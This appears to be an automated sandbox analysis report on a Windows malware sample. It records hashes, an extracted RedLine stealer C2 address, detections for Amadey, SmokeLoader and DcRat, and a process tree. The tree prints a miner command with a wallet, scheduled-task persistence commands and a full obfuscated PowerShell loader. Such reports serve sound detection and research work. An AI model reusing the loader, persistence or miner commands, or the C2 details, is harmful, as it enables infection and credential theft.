Analysis
-
max time kernel
82s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2022 00:45
Static task
static1
Behavioral task
behavioral1
Sample
9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe
Resource
win10v2004-20220812-en
General
-
Target
9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe
-
Size
340KB
-
MD5
258b594d256e8698142efe18067b9dc8
-
SHA1
7b0cf847003712b9b95131063d6c7102c136ed61
-
SHA256
9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1
-
SHA512
521e91828ed5462f40dabb7e9858e8912575cb2183f57b31c9acd57ed2e95fc26d517c092cc0c44cb837d1175a5b3c9bc0617becb57f301797ac8a949008ee30
-
SSDEEP
6144:k4nqu9/sfOVv1sukMPL3tcXdr33DS6fqiP7ITsq:k4nL/s23sxyKtrHDpqiP7
Malware Config
Extracted
redline
Google2
167.235.71.14:20469
-
auth_value
fb274d9691235ba015830da570a13578
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Amadey credential stealer module 4 IoCs
resource yara_rule behavioral1/files/0x000b000000022e7b-302.dat amadey_cred_module behavioral1/files/0x000b000000022e7b-304.dat amadey_cred_module behavioral1/memory/2792-305-0x00000000007A0000-0x00000000007C4000-memory.dmp amadey_cred_module behavioral1/files/0x000b000000022e7b-303.dat amadey_cred_module -
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral1/memory/4824-133-0x0000000002CD0000-0x0000000002CD9000-memory.dmp family_smokeloader -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/3620-148-0x0000000000100000-0x0000000000128000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 220 CB15.exe 3080 CE52.exe 1876 ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe 3488 D604.exe 4324 LYKAA.exe 4720 DF2D.exe 4928 rovwer.exe 5004 F3BF.exe 2232 F3BF.exe 2020 ldeep.bat.exe -
resource yara_rule behavioral1/files/0x0007000000022e6f-161.dat upx behavioral1/files/0x0007000000022e6f-162.dat upx behavioral1/memory/3488-166-0x0000000000960000-0x0000000001149000-memory.dmp upx behavioral1/memory/3488-169-0x0000000000960000-0x0000000001149000-memory.dmp upx -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation LYKAA.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation DF2D.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation rovwer.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation F3BF.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ldeep.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation CE52.exe -
Loads dropped DLL 13 IoCs
pid Process 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe 2232 F3BF.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 220 set thread context of 3620 220 CB15.exe 90 PID 4324 set thread context of 4172 4324 LYKAA.exe 119 -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral1/files/0x0007000000022e82-187.dat pyinstaller behavioral1/files/0x0007000000022e82-186.dat pyinstaller behavioral1/files/0x0007000000022e82-190.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3840 4720 WerFault.exe 99 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1720 schtasks.exe 4736 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1396 timeout.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 D604.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d601030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 D604.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c137e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 D604.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4824 9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe 4824 9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2976 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 4824 9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found 2976 Process not Found -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeDebugPrivilege 1876 ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeDebugPrivilege 4324 LYKAA.exe Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeDebugPrivilege 3620 vbc.exe Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeDebugPrivilege 2344 powershell.exe Token: SeShutdownPrivilege 2976 Process not Found Token: SeCreatePagefilePrivilege 2976 Process not Found Token: SeDebugPrivilege 2020 ldeep.bat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2976 wrote to memory of 220 2976 Process not Found 86 PID 2976 wrote to memory of 220 2976 Process not Found 86 PID 2976 wrote to memory of 220 2976 Process not Found 86 PID 2976 wrote to memory of 3080 2976 Process not Found 88 PID 2976 wrote to memory of 3080 2976 Process not Found 88 PID 3080 wrote to memory of 1876 3080 CE52.exe 89 PID 3080 wrote to memory of 1876 3080 CE52.exe 89 PID 220 wrote to memory of 3620 220 CB15.exe 90 PID 220 wrote to memory of 3620 220 CB15.exe 90 PID 220 wrote to memory of 3620 220 CB15.exe 90 PID 220 wrote to memory of 3620 220 CB15.exe 90 PID 220 wrote to memory of 3620 220 CB15.exe 90 PID 1876 wrote to memory of 4156 1876 ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe 91 PID 1876 wrote to memory of 4156 1876 ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe 91 PID 4156 wrote to memory of 1396 4156 cmd.exe 93 PID 4156 wrote to memory of 1396 4156 cmd.exe 93 PID 2976 wrote to memory of 3488 2976 Process not Found 94 PID 2976 wrote to memory of 3488 2976 Process not Found 94 PID 3488 wrote to memory of 2700 3488 D604.exe 96 PID 3488 wrote to memory of 2700 3488 D604.exe 96 PID 4156 wrote to memory of 4324 4156 cmd.exe 98 PID 4156 wrote to memory of 4324 4156 cmd.exe 98 PID 2976 wrote to memory of 4720 2976 Process not Found 99 PID 2976 wrote to memory of 4720 2976 Process not Found 99 PID 2976 wrote to memory of 4720 2976 Process not Found 99 PID 4324 wrote to memory of 1076 4324 LYKAA.exe 100 PID 4324 wrote to memory of 1076 4324 LYKAA.exe 100 PID 1076 wrote to memory of 1720 1076 cmd.exe 102 PID 1076 wrote to memory of 1720 1076 cmd.exe 102 PID 4720 wrote to memory of 4928 4720 DF2D.exe 103 PID 4720 wrote to memory of 4928 4720 DF2D.exe 103 PID 4720 wrote to memory of 4928 4720 DF2D.exe 103 PID 2976 wrote to memory of 5004 2976 Process not Found 106 PID 2976 wrote to memory of 5004 2976 Process not Found 106 PID 2976 wrote to memory of 4880 2976 Process not Found 107 PID 2976 wrote to memory of 4880 2976 Process not Found 107 PID 2976 wrote to memory of 4880 2976 Process not Found 107 PID 2976 wrote to memory of 4880 2976 Process not Found 107 PID 5004 wrote to memory of 2232 5004 F3BF.exe 108 PID 5004 wrote to memory of 2232 5004 F3BF.exe 108 PID 2976 wrote to memory of 4460 2976 Process not Found 109 PID 2976 wrote to memory of 4460 2976 Process not Found 109 PID 2976 wrote to memory of 4460 2976 Process not Found 109 PID 4928 wrote to memory of 4736 4928 rovwer.exe 110 PID 4928 wrote to memory of 4736 4928 rovwer.exe 110 PID 4928 wrote to memory of 4736 4928 rovwer.exe 110 PID 2976 wrote to memory of 2892 2976 Process not Found 111 PID 2976 wrote to memory of 2892 2976 Process not Found 111 PID 2976 wrote to memory of 2892 2976 Process not Found 111 PID 2976 wrote to memory of 2892 2976 Process not Found 111 PID 2976 wrote to memory of 2076 2976 Process not Found 113 PID 2976 wrote to memory of 2076 2976 Process not Found 113 PID 2976 wrote to memory of 2076 2976 Process not Found 113 PID 2976 wrote to memory of 3064 2976 Process not Found 114 PID 2976 wrote to memory of 3064 2976 Process not Found 114 PID 2976 wrote to memory of 3064 2976 Process not Found 114 PID 2976 wrote to memory of 3064 2976 Process not Found 114 PID 2976 wrote to memory of 2296 2976 Process not Found 115 PID 2976 wrote to memory of 2296 2976 Process not Found 115 PID 2976 wrote to memory of 2296 2976 Process not Found 115 PID 2976 wrote to memory of 2296 2976 Process not Found 115 PID 2976 wrote to memory of 872 2976 Process not Found 116 PID 2976 wrote to memory of 872 2976 Process not Found 116 PID 2976 wrote to memory of 872 2976 Process not Found 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe"C:\Users\Admin\AppData\Local\Temp\9c0f1ccdeeca7012745a6bac388444555001654b2e294a4cb0e66f62f41192e1.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4824
-
C:\Users\Admin\AppData\Local\Temp\CB15.exeC:\Users\Admin\AppData\Local\Temp\CB15.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Users\Admin\AppData\Local\Temp\CE52.exeC:\Users\Admin\AppData\Local\Temp\CE52.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Users\Admin\AppData\Roaming\ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe"C:\Users\Admin\AppData\Roaming\ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD4D9.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4156 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:1396
-
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"6⤵
- Creates scheduled task(s)
PID:1720
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs002 -p hybrid -t 55⤵PID:4172
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:2336
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D604.exeC:\Users\Admin\AppData\Local\Temp\D604.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\system32\cmd.execmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\D604.exe"2⤵PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\DF2D.exeC:\Users\Admin\AppData\Local\Temp\DF2D.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F3⤵
- Creates scheduled task(s)
PID:4736
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main3⤵PID:2792
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 11362⤵
- Program crash
PID:3840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4720 -ip 47201⤵PID:3352
-
C:\Users\Admin\AppData\Local\Temp\F3BF.exeC:\Users\Admin\AppData\Local\Temp\F3BF.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\F3BF.exeC:\Users\Admin\AppData\Local\Temp\F3BF.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:2232 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ldeep.bat" "3⤵PID:2952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -ep bypass -w hidden -c #4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Users\Admin\Downloads\ldeep.bat.exe"C:\Users\Admin\Downloads\ldeep.bat.exe" -noprofile -ep bypass -c $Tp='Lo@ad@'.Replace('@', '');$it='Rea@d@All@Te@xt@'.Replace('@', '');$wf='I@nvok@e@'.Replace('@', '');$fd='T@r@an@s@for@mFi@n@alBl@oc@k@'.Replace('@', '');$oA='Fr@omB@a@se6@4S@tri@ng@'.Replace('@', '');$Me='Syst@em@.@Sec@uri@ty.@Cryp@tog@ra@phy.@A@e@s@Ma@nag@e@d@'.Replace('@', '');$RA='Ent@r@yPo@in@t@'.Replace('@', '');$wV='Cha@ng@eEx@te@ns@io@n@'.Replace('@', '');$Iu='Crea@teD@ec@rypt@or@'.Replace('@', '');function NkeDM($qHlRi,$HMYJa,$JItfj){$xfAvG=[System.Security.Cryptography.Aes]::Create();$xfAvG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xfAvG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xfAvG.Key=[System.Convert]::$oA($HMYJa);$xfAvG.IV=[System.Convert]::$oA($JItfj);$LVpUP=$xfAvG.$Iu();$OHnAI=$LVpUP.$fd($qHlRi,0,$qHlRi.Length);$LVpUP.Dispose();$xfAvG.Dispose();$OHnAI;}function wjNBf($qHlRi){$UDhzI=New-Object System.IO.MemoryStream(,$qHlRi);$NuOeq=New-Object System.IO.MemoryStream;$cLvqG=New-Object System.IO.Compression.GZipStream($UDhzI,[IO.Compression.CompressionMode]::Decompress);$cLvqG.CopyTo($NuOeq);$cLvqG.Dispose();$UDhzI.Dispose();$NuOeq.Dispose();$NuOeq.ToArray();}function ftbeR($qHlRi,$HMYJa){$ZjjTi=[System.Reflection.Assembly]::$Tp([byte[]]$qHlRi);$DeQAL=$ZjjTi.$RA;$DeQAL.$wf($null,$HMYJa);}$lEMVX=[System.IO.File]::$it([System.IO.Path]::$wV([System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName,$null)).Split([Environment]::NewLine);$tMiRj=$lEMVX[$lEMVX.Length - 1];$SMWSj=[string[]]$tMiRj.Split('\');$bmvCc=wjNBf (NkeDM ([Convert]::$oA($SMWSj[0])) $SMWSj[2] $SMWSj[3]);$OQIsq=wjNBf (NkeDM ([Convert]::$oA($SMWSj[1])) $SMWSj[2] $SMWSj[3]);ftbeR $OQIsq $null;ftbeR $bmvCc $null;4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -c "$a = [System.Diagnostics.Process]::GetProcessById(2020);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;"5⤵PID:912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Uni.bat" "5⤵PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -c "$a = [System.Diagnostics.Process]::GetProcessById(2452);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;"5⤵PID:4568
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OxKlFFGRbQ.vbs"5⤵PID:5044
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OxKlFFGRbQ.bat" "6⤵PID:4232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -ep bypass -w hidden -c #7⤵PID:3732
-
-
